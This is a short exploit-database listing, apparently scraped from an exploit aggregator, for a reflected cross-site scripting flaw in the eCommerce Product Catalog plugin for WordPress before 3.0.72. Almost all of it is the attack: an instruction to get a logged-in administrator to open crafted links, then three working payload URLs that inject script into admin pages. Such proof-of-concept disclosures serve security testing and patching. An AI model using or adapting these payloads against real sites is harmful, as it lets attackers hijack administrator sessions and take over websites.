Exploit for eCommerce Product Catalog Plugin for WordPress < 3.0.72 - Reflected XSS

Name: Exploit for eCommerce Product Catalog Plugin for WordPress < 3.0.72 - Reflected XSS
Rating: 5 (57 reviews)

2022-10-17 | CVSS 0.4

## https://sploitus.com/exploit?id=WPEX-ID:739C9C3D-A543-4D5E-AA2A-BC74EE2C1D1D
Make a logged in admin open one of the URLs below

https://example.com/wp-admin/edit.php?post_type=al_product&page=extensions.php&implecode_install=1&slug=a&url="><script>alert(/XSS/)</script>

https://example.com/wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=aaa&find_option_name=</script><script>alert(/XSS/)</script>
https://example.com/wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=aaa&find_option_name=%2527]%2522)%3Balert(/XSS/)//